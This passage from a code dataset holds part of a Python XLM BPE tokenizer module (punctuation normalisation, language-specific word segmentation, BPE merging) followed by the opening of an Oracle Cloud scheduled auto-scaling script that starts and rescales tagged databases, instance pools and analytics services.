    turned the second ``re.sub`` into a pattern whose unescaped ASCII dot
    matched (and rewrote) every character of the input.  The fullwidth forms
    are restored below.
    """
    text = text.replace("，", ",")
    text = re.sub(r"。\s*", ". ", text)
    text = text.replace("、", ",")
    text = text.replace("”", '"')
    text = text.replace("“", '"')
    text = text.replace("∶", ":")
    text = text.replace("：", ":")
    text = text.replace("？", "?")
    text = text.replace("《", '"')
    text = text.replace("》", '"')
    text = text.replace("）", ")")
    text = text.replace("！", "!")
    text = text.replace("（", "(")
    text = text.replace("；", ";")
    text = text.replace("１", "1")
    text = text.replace("」", '"')
    text = text.replace("「", '"')
    text = text.replace("０", "0")
    text = text.replace("３", "3")
    text = text.replace("２", "2")
    text = text.replace("５", "5")
    text = text.replace("６", "6")
    text = text.replace("９", "9")
    text = text.replace("７", "7")
    text = text.replace("８", "8")
    text = text.replace("４", "4")
    # fullwidth full stop (U+FF0E) — not a regex metacharacter
    text = re.sub(r"．\s*", ". ", text)
    text = text.replace("～", "~")
    text = text.replace("’", "'")
    text = text.replace("…", "...")
    text = text.replace("━", "-")
    text = text.replace("〈", "<")
    text = text.replace("〉", ">")
    text = text.replace("【", "[")
    text = text.replace("】", "]")
    text = text.replace("％", "%")
    return text
def remove_non_printing_char(text):
    """Drop every character whose Unicode category starts with 'C' (control, format, etc.)."""
    return "".join(ch for ch in text if not unicodedata.category(ch).startswith('C'))
def romanian_preprocessing(text):
    """Normalise Romanian cedilla letters to comma-below, then strip diacritics.

    Mirrors the WMT16 scripts:
    - normalise-romanian.py: S/T-cedilla -> S/T-comma-below
    - remove-diacritics.py:  comma-below, breve and circumflex forms -> ASCII
    """
    # https://github.com/rsennrich/wmt16-scripts/blob/master/preprocess/normalise-romanian.py
    for old, new in (("\u015e", "\u0218"), ("\u015f", "\u0219"),
                     ("\u0162", "\u021a"), ("\u0163", "\u021b")):
        text = text.replace(old, new)
    # https://github.com/rsennrich/wmt16-scripts/blob/master/preprocess/remove-diacritics.py
    for old, new in (("\u0218", "S"), ("\u0219", "s"),   # S/s-comma
                     ("\u021a", "T"), ("\u021b", "t"),   # T/t-comma
                     ("\u0102", "A"), ("\u0103", "a"),
                     ("\u00C2", "A"), ("\u00E2", "a"),
                     ("\u00CE", "I"), ("\u00EE", "i")):
        text = text.replace(old, new)
    return text
class XLMTokenizer(PreTrainedTokenizer):
    """
    BPE tokenizer for XLM.

    Pipeline:
      1. optional lower-casing + accent stripping (``do_lowercase_and_remove_accent``,
         True for the v1.x checkpoints, False for XLM-17 & XLM-100),
      2. language-specific word segmentation: Moses for most languages,
         KyTea for Japanese, Jieba for Chinese, PyThaiNLP for Thai,
      3. Byte-Pair Encoding with the supplied merges file.

    Fixes relative to the previous revision: the mutable list default for
    ``additional_special_tokens`` was replaced with a None sentinel, the
    vocab/merges file handles are now closed via context managers, and the
    bare ``except:`` in :meth:`bpe` now catches only ``ValueError``.
    """
    vocab_files_names = VOCAB_FILES_NAMES
    pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
    pretrained_init_configuration = PRETRAINED_INIT_CONFIGURATION
    max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES

    def __init__(self, vocab_file, merges_file, unk_token="<unk>", bos_token="<s>",
                 sep_token="</s>", pad_token="<pad>", cls_token="</s>",
                 mask_token="<special1>", additional_special_tokens=None,
                 lang2id=None, id2lang=None, do_lowercase_and_remove_accent=True,
                 **kwargs):
        # None replaces the old shared mutable list default; the effective
        # default (the ten <specialN> placeholders) is unchanged.
        if additional_special_tokens is None:
            additional_special_tokens = [
                "<special0>", "<special1>", "<special2>", "<special3>",
                "<special4>", "<special5>", "<special6>", "<special7>",
                "<special8>", "<special9>"]
        super(XLMTokenizer, self).__init__(unk_token=unk_token, bos_token=bos_token,
                                           sep_token=sep_token, pad_token=pad_token,
                                           cls_token=cls_token, mask_token=mask_token,
                                           additional_special_tokens=additional_special_tokens,
                                           **kwargs)
        # cache of sm.MosesPunctNormalizer instances, keyed by language
        self.cache_moses_punct_normalizer = dict()
        # cache of sm.MosesTokenizer instances, keyed by language
        self.cache_moses_tokenizer = dict()
        # languages that are NOT handled by the Moses tokenizer
        self.lang_with_custom_tokenizer = set(['zh', 'th', 'ja'])
        # True for current supported model (v1.2.0), False for XLM-17 & 100
        self.do_lowercase_and_remove_accent = do_lowercase_and_remove_accent
        self.lang2id = lang2id
        self.id2lang = id2lang
        if lang2id is not None and id2lang is not None:
            assert len(lang2id) == len(id2lang)
        # external word tokenizers are created lazily (see ja_tokenize / _tokenize)
        self.ja_word_tokenizer = None
        self.zh_word_tokenizer = None
        # use context managers so the vocab/merges handles are closed promptly
        with open(vocab_file, encoding="utf-8") as vocab_handle:
            self.encoder = json.load(vocab_handle)
        self.decoder = {v: k for k, v in self.encoder.items()}
        with open(merges_file, encoding='utf-8') as merges_handle:
            merges = merges_handle.read().split('\n')[:-1]
        merges = [tuple(merge.split()[:2]) for merge in merges]
        self.bpe_ranks = dict(zip(merges, range(len(merges))))
        # per-word BPE result cache: token -> space-joined subwords
        self.cache = {}

    def moses_punct_norm(self, text, lang):
        """Run (and cache) the sacremoses punctuation normalizer for *lang*."""
        if lang not in self.cache_moses_punct_normalizer:
            punct_normalizer = sm.MosesPunctNormalizer(lang=lang)
            self.cache_moses_punct_normalizer[lang] = punct_normalizer
        else:
            punct_normalizer = self.cache_moses_punct_normalizer[lang]
        return punct_normalizer.normalize(text)

    def moses_tokenize(self, text, lang):
        """Run (and cache) the sacremoses word tokenizer for *lang*; returns a token list."""
        if lang not in self.cache_moses_tokenizer:
            moses_tokenizer = sm.MosesTokenizer(lang=lang)
            self.cache_moses_tokenizer[lang] = moses_tokenizer
        else:
            moses_tokenizer = self.cache_moses_tokenizer[lang]
        return moses_tokenizer.tokenize(text, return_str=False, escape=False)

    def moses_pipeline(self, text, lang):
        """Moses-style cleanup: unicode punctuation, punct normalization, control-char removal."""
        text = replace_unicode_punct(text)
        text = self.moses_punct_norm(text, lang)
        text = remove_non_printing_char(text)
        return text

    def ja_tokenize(self, text):
        """Tokenize Japanese text with KyTea, creating the tokenizer on first use.

        Raises the underlying import/attribute error (after logging install
        instructions) if Mykytea is not available.
        """
        if self.ja_word_tokenizer is None:
            try:
                import Mykytea
                self.ja_word_tokenizer = Mykytea.Mykytea('-model %s/local/share/kytea/model.bin' % os.path.expanduser('~'))
            except (AttributeError, ImportError) as e:
                logger.error("Make sure you install KyTea (https://github.com/neubig/kytea) and it's python wrapper (https://github.com/chezou/Mykytea-python) with the following steps")
                logger.error("1. git clone git@github.com:neubig/kytea.git && cd kytea")
                logger.error("2. autoreconf -i")
                logger.error("3. ./configure --prefix=$HOME/local")
                logger.error("4. make && make install")
                logger.error("5. pip install kytea")
                raise e
        return list(self.ja_word_tokenizer.getWS(text))

    @property
    def vocab_size(self):
        """Number of entries in the base vocabulary (excluding added tokens)."""
        return len(self.encoder)

    def bpe(self, token):
        """Apply BPE merges to a single word *token*; returns space-joined subwords.

        The word is represented as a tuple of symbols with '</w>' appended to
        the last character; the lowest-ranked adjacent pair is merged until no
        known pair remains. Results are memoized in ``self.cache``.
        """
        word = tuple(token[:-1]) + (token[-1] + '</w>',)
        if token in self.cache:
            return self.cache[token]
        pairs = get_pairs(word)
        if not pairs:
            return token + '</w>'
        while True:
            # merge the pair with the best (lowest) rank; unknown pairs rank infinity
            bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float('inf')))
            if bigram not in self.bpe_ranks:
                break
            first, second = bigram
            new_word = []
            i = 0
            while i < len(word):
                try:
                    j = word.index(first, i)
                    new_word.extend(word[i:j])
                    i = j
                except ValueError:  # was a bare except; only index() can raise here
                    new_word.extend(word[i:])
                    break
                if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
                    new_word.append(first + second)
                    i += 2
                else:
                    new_word.append(word[i])
                    i += 1
            new_word = tuple(new_word)
            word = new_word
            if len(word) == 1:
                break
            else:
                pairs = get_pairs(word)
        word = ' '.join(word)
        if word == '\n </w>':
            word = '\n</w>'
        self.cache[token] = word
        return word

    def _tokenize(self, text, lang='en', bypass_tokenizer=False):
        """Word-tokenize *text* for *lang*, then BPE-split each word.

        With ``bypass_tokenizer`` the text is assumed pre-tokenized
        (whitespace separated) and only BPE is applied.
        """
        if lang and self.lang2id and lang not in self.lang2id:
            logger.error("Supplied language code not found in lang2id mapping. Please check that your language is supported by the loaded pretrained model.")
        if bypass_tokenizer:
            text = text.split()
        elif lang not in self.lang_with_custom_tokenizer:
            text = self.moses_pipeline(text, lang=lang)
            # TODO: make sure we are using `xlm-mlm-enro-1024`, since XLM-100 doesn't have this step
            if lang == 'ro':
                text = romanian_preprocessing(text)
            text = self.moses_tokenize(text, lang=lang)
        elif lang == 'th':
            text = self.moses_pipeline(text, lang=lang)
            try:
                if 'pythainlp' not in sys.modules:
                    from pythainlp.tokenize import word_tokenize as th_word_tokenize
                else:
                    th_word_tokenize = sys.modules['pythainlp'].word_tokenize
            except (AttributeError, ImportError) as e:
                logger.error("Make sure you install PyThaiNLP (https://github.com/PyThaiNLP/pythainlp) with the following steps")
                logger.error("1. pip install pythainlp")
                raise e
            text = th_word_tokenize(text)
        elif lang == 'zh':
            try:
                if 'jieba' not in sys.modules:
                    import jieba
                else:
                    jieba = sys.modules['jieba']
            except (AttributeError, ImportError) as e:
                logger.error("Make sure you install Jieba (https://github.com/fxsjy/jieba) with the following steps")
                logger.error("1. pip install jieba")
                raise e
            text = ' '.join(jieba.cut(text))
            text = self.moses_pipeline(text, lang=lang)
            text = text.split()
        elif lang == 'ja':
            text = self.moses_pipeline(text, lang=lang)
            text = self.ja_tokenize(text)
        else:
            raise ValueError('It should not reach here')
        if self.do_lowercase_and_remove_accent and not bypass_tokenizer:
            text = lowercase_and_remove_accent(text)
        split_tokens = []
        for token in text:
            if token:
                split_tokens.extend([t for t in self.bpe(token).split(' ')])
        return split_tokens

    def _convert_token_to_id(self, token):
        """Convert a token (str) to its vocabulary id, falling back to the unk id."""
        return self.encoder.get(token, self.encoder.get(self.unk_token))

    def _convert_id_to_token(self, index):
        """Convert a vocabulary id (int) back to its token string."""
        return self.decoder.get(index, self.unk_token)

    def convert_tokens_to_string(self, tokens):
        """Converts a sequence of tokens (string) in a single string."""
        out_string = ''.join(tokens).replace('</w>', ' ').strip()
        return out_string

    def add_special_tokens_single_sentence(self, token_ids):
        """
        Adds special tokens to a sequence for sequence classification tasks.
        An XLM sequence has the following format: [CLS] X [SEP]
        """
        return [self.cls_token_id] + token_ids + [self.sep_token_id]

    def add_special_tokens_sentences_pair(self, token_ids_0, token_ids_1):
        """
        Adds special tokens to a sequence pair for sequence classification tasks.
        An XLM sequence pair has the following format: [CLS] A [SEP] B [SEP]
        """
        sep = [self.sep_token_id]
        cls = [self.cls_token_id]
        return cls + token_ids_0 + sep + token_ids_1 + sep

    def save_vocabulary(self, save_directory):
        """Save the tokenizer vocabulary and merge files to a directory.

        Returns (vocab_file_path, merge_file_path), or None when
        *save_directory* is not an existing directory.
        """
        if not os.path.isdir(save_directory):
            logger.error("Vocabulary path ({}) should be a directory".format(save_directory))
            return
        vocab_file = os.path.join(save_directory, VOCAB_FILES_NAMES['vocab_file'])
        merge_file = os.path.join(save_directory, VOCAB_FILES_NAMES['merges_file'])
        with open(vocab_file, 'w', encoding='utf-8') as f:
            f.write(json.dumps(self.encoder, ensure_ascii=False))
        index = 0
        with open(merge_file, "w", encoding="utf-8") as writer:
            for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
                if index != token_index:
                    logger.warning("Saving vocabulary to {}: BPE merge indices are not consecutive."
                                   " Please check that the tokenizer is not corrupted!".format(merge_file))
                    index = token_index
                writer.write(' '.join(bpe_tokens) + u'\n')
                index += 1
        return vocab_file, merge_file
| true | true |
f72314b5ed81d84350466ae17742bdd5ed9d6af1 | 115,105 | py | Python | AutoScaleALL.py | TheDosah/AutoScale | 8975513d770fdff06c376ad17297cd7bcc63030c | [
"UPL-1.0"
] | null | null | null | AutoScaleALL.py | TheDosah/AutoScale | 8975513d770fdff06c376ad17297cd7bcc63030c | [
"UPL-1.0"
] | null | null | null | AutoScaleALL.py | TheDosah/AutoScale | 8975513d770fdff06c376ad17297cd7bcc63030c | [
"UPL-1.0"
] | null | null | null | #!/home/opc/py36env/bin/python
#################################################################################################################
# OCI - Scheduled Auto Scaling Script
# Copyright (c) 2016, 2020, Oracle and/or its affiliates. All rights reserved.
# This software is licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl
#
# Written by: Richard Garsthagen
# Contributors: Joel Nation
# Contributors: Adi Zohar
#################################################################################################################
# Application Command line parameters
#
# -t config - Config file section to use (tenancy profile)
# -ip - Use Instance Principals for Authentication
# -dt - Use Instance Principals with delegation token for cloud shell
# -a - Action - All,Up,Down
# -tag - Tag - Default Schedule
# -rg - Filter on Region
# -ic - include compartment ocid
# -ec - exclude compartment ocid
# -ignrtime - ignore region time zone
# -ignormysql- ignore mysql execution
# -printocid - print ocid of object
# -topic - topic to sent summary
# -h - help
#
#################################################################################################################
import oci
import datetime
import calendar
import threading
import time
import sys
import argparse
import os
import logging
# You can modify / translate the tag names used by this script - case sensitive!!!
AnyDay = "AnyDay"
Weekend = "Weekend"
WeekDay = "WeekDay"
Version = "2022.02.03"
# ============== CONFIGURE THIS SECTION ======================
# OCI Configuration
# ============================================================
ComputeShutdownMethod = "SOFTSTOP"
LogLevel = "ALL" # Use ALL or ERRORS. When set to ERRORS only a notification will be published if error occurs
TopicID = "" # Enter Topic OCID if you want the script to publish a message about the scaling actions
AlternativeWeekend = False # Set to True is your weekend is Friday/Saturday
RateLimitDelay = 2 # Time in seconds to wait before retry of operation
##########################################################################
# Get current host time and utc on execution
##########################################################################
current_host_time = datetime.datetime.today()
current_utc_time = datetime.datetime.utcnow()
##########################################################################
# Print header centered
##########################################################################
def print_header(name):
    """Emit *name* centered in a 90-character '#' banner via MakeOut."""
    width = 90
    MakeOut("")
    MakeOut("#" * width)
    MakeOut("#" + name.center(width - 2, " ") + "#")
    MakeOut("#" * width)
##########################################################################
# Get Current Hour per the region
##########################################################################
def get_current_hour(region, ignore_region_time=False):
    """Return (weekday_number, weekday_name, hour) for *region*'s local time.

    The offset table maps OCI region identifiers to a fixed UTC offset in
    hours (no DST handling).  Regions whose name starts with 'eu' or 'uk'
    use +2 / 0 respectively; unknown regions fall back to offset 0.  With
    *ignore_region_time* the host's local time is used instead.
    Replaces an 80-line if/elif chain with a dispatch table; semantics are
    unchanged (prefix checks still take precedence, as before).
    """
    # Fixed UTC offsets per region, in hours (may be fractional).
    region_offsets = {
        'af-johannesburg-1': 2,
        'ap-chiyoda-1': 9,
        'ap-chuncheon-1': 9,
        'ap-hyderabad-1': 5.5,
        'ap-melbourne-1': 10,
        'ap-mumbai-1': 5.5,
        'ap-osaka-1': 9,
        'ap-seoul-1': 9,
        'ap-singapore-1': 8,
        'ap-sydney-1': 10,
        'ap-tokyo-1': 9,
        'ca-montreal-1': -4,
        'ca-toronto-1': -4,
        'il-jerusalem-1': 3,
        'me-abudhabi-1': 4,
        'me-dubai-1': 4,
        'me-jeddah-1': 3,
        'sa-santiago-1': -4,
        'sa-saopaulo-1': -3,
        'sa-vinhedo-1': -3,
        'us-ashburn-1': -4,
        'us-gov-ashburn-1': -4,
        'us-gov-chicago-1': -5,
        'us-gov-fortworth-1': -5,
        'us-gov-fortworth-2': -5,
        'us-gov-phoenix-1': -7,
        'us-gov-sterling-1 ': -4,  # NOTE(review): trailing space kept from original — likely a typo, confirm
        'us-gov-sterling-2': -4,
        'us-langley-1': -5,
        'us-luke-1': -7,
        'us-phoenix-1': -7,
        'us-sanjose-1': -7,
    }
    if region[:2] == 'eu':
        timezdiff = 2
    elif region[:2] == 'uk':
        timezdiff = 0
    else:
        timezdiff = region_offsets.get(region, 0)

    # Get current host time
    current_time = current_host_time

    # if need to use region time
    if not ignore_region_time:
        current_time = current_utc_time + datetime.timedelta(hours=timezdiff)

    # get the variables to return
    iDayOfWeek = current_time.weekday()       # Day of week as a number (0=Monday)
    iDay = calendar.day_name[iDayOfWeek]      # Day of week as string
    iCurrentHour = current_time.hour
    return iDayOfWeek, iDay, iCurrentHour
##########################################################################
# Create signer for Authentication
# Input - config_profile and is_instance_principals and is_delegation_token
# Output - config and signer objects
##########################################################################
def create_signer(config_profile, is_instance_principals, is_delegation_token):
    """Build the OCI (config, signer) pair for one of three auth modes.

    Priority: instance principals, then delegation token (cloud shell),
    then the local OCI config file profile *config_profile*.
    Exits the process (SystemExit) on unrecoverable auth setup errors.
    """
    # if instance principals authentications
    if is_instance_principals:
        try:
            signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()
            # minimal config dict: region/tenancy come from the signer itself
            config = {'region': signer.region, 'tenancy': signer.tenancy_id}
            return config, signer
        except Exception:
            print_header("Error obtaining instance principals certificate, aborting")
            raise SystemExit
    # -----------------------------
    # Delegation Token
    # -----------------------------
    elif is_delegation_token:
        try:
            # check if env variables OCI_CONFIG_FILE, OCI_CONFIG_PROFILE exist and use them
            env_config_file = os.environ.get('OCI_CONFIG_FILE')
            env_config_section = os.environ.get('OCI_CONFIG_PROFILE')
            # check if file exist
            if env_config_file is None or env_config_section is None:
                MakeOut("*** OCI_CONFIG_FILE and OCI_CONFIG_PROFILE env variables not found, abort. ***")
                MakeOut("")
                raise SystemExit
            config = oci.config.from_file(env_config_file, env_config_section)
            delegation_token_location = config["delegation_token_file"]
            with open(delegation_token_location, 'r') as delegation_token_file:
                delegation_token = delegation_token_file.read().strip()
            # get signer from delegation token
            signer = oci.auth.signers.InstancePrincipalsDelegationTokenSigner(delegation_token=delegation_token)
            return config, signer
        except KeyError:
            # config profile lacks the delegation_token_file entry
            MakeOut("* Key Error obtaining delegation_token_file")
            raise SystemExit
        except Exception:
            raise
    # -----------------------------
    # config file authentication
    # -----------------------------
    else:
        config = oci.config.from_file(
            oci.config.DEFAULT_LOCATION,
            (config_profile if config_profile else oci.config.DEFAULT_PROFILE)
        )
        # key_file and key_content are mutually exclusive; .get() tolerates either
        signer = oci.signer.Signer(
            tenancy=config["tenancy"],
            user=config["user"],
            fingerprint=config["fingerprint"],
            private_key_file_location=config.get("key_file"),
            pass_phrase=oci.config.get_config_value_or_default(config, "pass_phrase"),
            private_key_content=config.get("key_content")
        )
        return config, signer
##########################################################################
# Configure logging output
##########################################################################
def MakeOut(msg, no_end=False):
    """Write *msg* to the 'log.out' file via the logging module.

    NOTE(review): logging.basicConfig only has an effect on the first call in
    the process; the repeated calls here are harmless no-ops afterwards.
    *no_end* is accepted for interface compatibility but is currently unused.
    """
    logging.basicConfig(filename='log.out', format='%(asctime)s %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')
    logging.warning(msg)
def MakeLog(msg, no_end=False):
    """Append a timestamped *msg* line to 'log.log'.

    Bug fix: the previous implementation re-opened the file in 'w' mode
    (truncating the log on every call), leaked the file handle, and
    permanently redirected sys.stdout for the whole process.  This version
    appends with a context manager and leaves sys.stdout alone.
    *no_end* is accepted for interface compatibility but is currently unused.
    """
    stamp = datetime.datetime.today().strftime('%d/%m/%Y %I:%M:%S.%f %p')
    with open('log.log', 'a') as log_file:
        print(stamp + "\t" + msg, file=log_file)
##########################################################################
# isWeekDay
##########################################################################
def isWeekDay(day):
    """Return True when *day* (0=Monday .. 6=Sunday) is a working day.

    With the module-level AlternativeWeekend flag set, Friday/Saturday (4, 5)
    count as the weekend instead of Saturday/Sunday (5, 6).
    """
    weekend_days = (4, 5) if AlternativeWeekend else (5, 6)
    return day not in weekend_days
###############################################
# isDeleted
###############################################
def isDeleted(state):
    """Return True when *state* is any terminated/terminating/deleted/deleting state."""
    try:
        return state in ("TERMINATED", "TERMINATING", "DELETED", "DELETING")
    except Exception:
        # Resource without a usable lifecycle state: treat it as deleted.
        MakeOut("No lifecyclestate found, ignoring resource")
        MakeOut(state)
        return True
###############################################
# AutonomousThread
###############################################
class AutonomousThread(threading.Thread):
    """Worker thread: start an Autonomous Database, wait until AVAILABLE, then rescale its CPUs.

    Results are appended to the module-level success/errors lists;
    ErrorsFound is set on failure.  API calls are retried on HTTP 429.
    """
    def __init__(self, threadID, ID, NAME, CPU):
        threading.Thread.__init__(self)
        self.threadID = threadID   # logical thread number (informational)
        self.ID = ID               # autonomous database OCID
        self.NAME = NAME           # display name (for log messages)
        self.CPU = CPU             # target cpu_core_count after start
    def run(self):
        """Start the database, poll until AVAILABLE, then apply the CPU count."""
        global total_resources
        global ErrorsFound
        global errors
        global success
        MakeOut(" - Starting Autonomous DB {} and after that scaling to {} cpus".format(self.NAME, self.CPU))
        # Retry loop: 429 means throttled -> wait and retry; any other error aborts.
        # NOTE(review): `except ... as response` shadows the earlier response variable.
        Retry = True
        while Retry:
            try:
                response = database.start_autonomous_database(autonomous_database_id=self.ID)
                Retry = False
                success.append("Started Autonomous DB {}".format(self.NAME))
            except oci.exceptions.ServiceError as response:
                if response.status == 429:
                    MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                    time.sleep(RateLimitDelay)
                else:
                    ErrorsFound = True
                    errors.append(" - Error ({}) Starting Autonomous DB {}".format(response.status, self.NAME))
                    Retry = False
        # Poll every 10s until the database reports AVAILABLE.
        response = database.get_autonomous_database(autonomous_database_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
        time.sleep(10)
        while response.data.lifecycle_state != "AVAILABLE":
            response = database.get_autonomous_database(autonomous_database_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
            time.sleep(10)
        MakeOut("Autonomous DB {} started, re-scaling to {} cpus".format(self.NAME, self.CPU))
        dbupdate = oci.database.models.UpdateAutonomousDatabaseDetails()
        dbupdate.cpu_core_count = self.CPU
        # Same 429-aware retry loop for the rescale call.
        Retry = True
        while Retry:
            try:
                response = database.update_autonomous_database(autonomous_database_id=self.ID, update_autonomous_database_details=dbupdate)
                Retry = False
                success.append("Autonomous DB {} started, re-scaling to {} cpus".format(self.NAME, self.CPU))
            except oci.exceptions.ServiceError as response:
                if response.status == 429:
                    MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                    time.sleep(RateLimitDelay)
                else:
                    errors.append(" - Error ({}) re-scaling to {} cpus for {}".format(response.status, self.CPU, self.NAME))
                    Retry = False
###############################################
# PoolThread
###############################################
class PoolThread(threading.Thread):
    """Worker thread: start an Instance Pool, wait until RUNNING, then rescale its size.

    Results are appended to the module-level success/errors lists;
    ErrorsFound is set on rescale failure.  API calls are retried on HTTP 429.
    """
    def __init__(self, threadID, ID, NAME, INSTANCES):
        threading.Thread.__init__(self)
        self.threadID = threadID       # logical thread number (informational)
        self.ID = ID                   # instance pool OCID
        self.NAME = NAME               # display name (for log messages)
        self.INSTANCES = INSTANCES     # target pool size after start
    def run(self):
        """Start the pool, poll until RUNNING, then apply the target size."""
        global total_resources
        global ErrorsFound
        global errors
        global success
        MakeOut(" - Starting Instance Pool {} and after that scaling to {} instances".format(self.NAME, self.INSTANCES))
        # Retry loop: 429 means throttled -> wait and retry; any other error aborts.
        Retry = True
        while Retry:
            try:
                response = pool.start_instance_pool(instance_pool_id=self.ID)
                Retry = False
                success.append(" - Starting Instance Pool {}".format(self.NAME))
            except oci.exceptions.ServiceError as response:
                if response.status == 429:
                    MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                    time.sleep(RateLimitDelay)
                else:
                    errors.append(" - Error ({}) starting instance pool {}".format(response.status, self.NAME))
                    Retry = False
        # Poll every 10s until the pool reports RUNNING.
        response = pool.get_instance_pool(instance_pool_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
        time.sleep(10)
        while response.data.lifecycle_state != "RUNNING":
            response = pool.get_instance_pool(instance_pool_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
            time.sleep(10)
        MakeOut("Instance pool {} started, re-scaling to {} instances".format(self.NAME, self.INSTANCES))
        pooldetails = oci.core.models.UpdateInstancePoolDetails()
        pooldetails.size = self.INSTANCES
        # Same 429-aware retry loop for the resize call.
        Retry = True
        while Retry:
            try:
                response = pool.update_instance_pool(instance_pool_id=self.ID, update_instance_pool_details=pooldetails)
                Retry = False
                success.append("Rescaling Instance Pool {} to {} instances".format(self.NAME, self.INSTANCES))
            except oci.exceptions.ServiceError as response:
                if response.status == 429:
                    MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                    time.sleep(RateLimitDelay)
                else:
                    ErrorsFound = True
                    errors.append(" - Error ({}) rescaling instance pool {}".format(response.status, self.NAME))
                    Retry = False
###############################################
# AnalyticsThread
###############################################
class AnalyticsThread(threading.Thread):
    """Worker thread: start an Analytics instance, wait until ACTIVE, then rescale its OCPUs.

    Results are appended to the module-level success/errors lists;
    ErrorsFound is set on start failure.  API calls are retried on HTTP 429.
    NOTE(review): unlike the other threads, a rescale failure here does not
    set ErrorsFound — confirm whether that is intentional.
    """
    def __init__(self, threadID, ID, NAME, CPU):
        threading.Thread.__init__(self)
        self.threadID = threadID   # logical thread number (informational)
        self.ID = ID               # analytics instance OCID
        self.NAME = NAME           # display name (for log messages)
        self.CPU = CPU             # target OLPU (OCPU) count after start
    def run(self):
        """Start the instance, poll until ACTIVE, then apply the OCPU capacity."""
        global total_resources
        global ErrorsFound
        global errors
        global success
        MakeOut(" - Starting Analytics Service {} and after that scaling to {} cpus".format(self.NAME, self.CPU))
        # Retry loop: 429 means throttled -> wait and retry; any other error aborts.
        Retry = True
        while Retry:
            try:
                response = analytics.start_analytics_instance(analytics_instance_id=self.ID)
                Retry = False
                success.append("Started Analytics Service {}".format(self.NAME))
            except oci.exceptions.ServiceError as response:
                if response.status == 429:
                    MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                    time.sleep(RateLimitDelay)
                else:
                    ErrorsFound = True
                    errors.append(" - Error ({}) Starting Analytics Service {}".format(response.status, self.NAME))
                    Retry = False
        # Poll every 10s until the instance reports ACTIVE.
        response = analytics.get_analytics_instance(analytics_instance_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
        time.sleep(10)
        while response.data.lifecycle_state != "ACTIVE":
            response = analytics.get_analytics_instance(analytics_instance_id=self.ID, retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY)
            time.sleep(10)
        MakeOut("Analytics Service {} started, re-scaling to {} cpus".format(self.NAME, self.CPU))
        capacity = oci.analytics.models.capacity.Capacity()
        capacity.capacity_value = self.CPU
        capacity.capacity_type = capacity.CAPACITY_TYPE_OLPU_COUNT
        details = oci.analytics.models.ScaleAnalyticsInstanceDetails()
        details.capacity = capacity
        # Same 429-aware retry loop for the scale call.
        Retry = True
        while Retry:
            try:
                response = analytics.scale_analytics_instance(analytics_instance_id=self.ID, scale_analytics_instance_details=details)
                Retry = False
                success.append("Analytics Service {} started, re-scaling to {} cpus".format(self.NAME, self.CPU))
            except oci.exceptions.ServiceError as response:
                if response.status == 429:
                    MakeOut("Rate limit kicking in.. waiting {} seconds...".format(RateLimitDelay))
                    time.sleep(RateLimitDelay)
                else:
                    errors.append("Error ({}) re-scaling Analytics to {} cpus for {}".format(response.status, self.CPU, self.NAME))
                    Retry = False
##########################################################################
# Load compartments
##########################################################################
def identity_read_compartments(identity, tenancy):
    """Return every compartment in the tenancy, including the root.

    Args:
        identity: oci.identity.IdentityClient used to list compartments.
        tenancy:  oci.identity.models.Tenancy whose compartment tree is read.

    Returns:
        list of oci.identity.models.Compartment covering the whole subtree
        of the tenancy root, plus a synthetic ACTIVE entry for the root
        compartment itself (list_compartments does not return the root).

    Raises:
        RuntimeError: wrapping any failure from the OCI identity service,
            chained to the original exception.
    """
    MakeOut("Loading Compartments...")
    try:
        # Paginate through the entire compartment subtree in one helper call.
        cs = oci.pagination.list_call_get_all_results(
            identity.list_compartments,
            tenancy.id,
            compartment_id_in_subtree=True,
            retry_strategy=oci.retry.DEFAULT_RETRY_STRATEGY
        ).data

        # The root (tenancy) compartment is not part of list_compartments;
        # append a minimal stand-in so callers can treat it uniformly.
        tenant_compartment = oci.identity.models.Compartment()
        tenant_compartment.id = tenancy.id
        tenant_compartment.name = tenancy.name
        tenant_compartment.lifecycle_state = oci.identity.models.Compartment.LIFECYCLE_STATE_ACTIVE
        cs.append(tenant_compartment)

        MakeOut("    Total " + str(len(cs)) + " compartments loaded.")
        return cs
    except Exception as e:
        # Chain the cause explicitly so the original traceback is preserved
        # as __cause__ rather than only as implicit __context__.
        raise RuntimeError("Error in identity_read_compartments: " + str(e.args)) from e
##########################################################################
# Handle Region
##########################################################################
def autoscale_region(region):
# Global Paramters for update
global total_resources
global ErrorsFound
global errors
global success
MakeOut("Starting Auto Scaling script on region {}, executing {} actions".format(region, Action))
threads = [] # Thread array for async AutonomousDB start and rescale
tcount = 0
###############################################
# Get Current Day, time
###############################################
DayOfWeek, Day, CurrentHour = get_current_hour(region, cmd.ignore_region_time)
if AlternativeWeekend:
MakeOut("Using Alternative weekend (Friday and Saturday as weekend")
if cmd.ignore_region_time:
MakeOut("Ignoring Region Datetime, Using local time")
MakeOut("Day of week: {}, IsWeekday: {}, Current hour: {}".format(Day, isWeekDay(DayOfWeek), CurrentHour))
# Array start with 0 so decrease CurrentHour with 1, if hour = 0 then 23
CurrentHour = 23 if CurrentHour == 0 else CurrentHour - 1
###############################################
# Find all resources with a Schedule Tag
###############################################
MakeOut("Getting all resources supported by the search function...")
query = "query all resources where (definedTags.namespace = '{}')".format(PredefinedTag)
query += " && compartmentId = '" + compartment_include + "'" if compartment_include else ""
